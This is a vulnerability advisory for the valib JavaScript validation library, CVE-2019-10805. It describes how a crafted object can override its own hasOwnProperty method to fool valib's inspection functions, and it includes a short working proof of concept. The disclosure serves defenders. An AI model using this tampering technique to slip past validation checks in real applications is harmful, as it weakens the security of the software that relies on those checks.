Internal Property Tampering Affecting valib package, versions *
Snyk CVSS
Attack Complexity
High
Scope
Changed
Integrity
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.09% (38th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-VALIB-559015
- published 28 Feb 2020
- disclosed 28 Feb 2020
- credit Feng Xiao (xiaofen9)
Introduced: 28 Feb 2020
CVE-2019-10805 Open this link in a new tabHow to fix?
There is no fixed version for valib.
Overview
valib is an A standalone javascript library tailored for validation.
Affected versions of this package are vulnerable to Internal Property Tampering. A maliciously crafted JavaScript object can bypass several inspection functions provided by valib. Valib uses a built-in function (hasOwnProperty) from the unsafe user-input to examine an object. It is possible for a crafted payload to overwrite this function to manipulate the inspection results to bypass security checks.
PoC by Feng Xiao (xiaofen9)
"use strict";
var valib = require('valib');
var json = {
key1: null,
key2: {
url: "http://example.com"
},
key3: "17850",
key4: "OK",
key5: "2012-10-06T04:13:00+00:00",
key6: [1, 2, 3],
key7: "Yes"
};
json.hasOwnProperty = function(val) {return false;}
function test(userJson){
console.log(valib.Object.isEmpty(userJson));
console.log(valib.Object.countKeys(userJson));
console.log(valib.Object.hasValue(userJson, "Yes"));
}
test(json);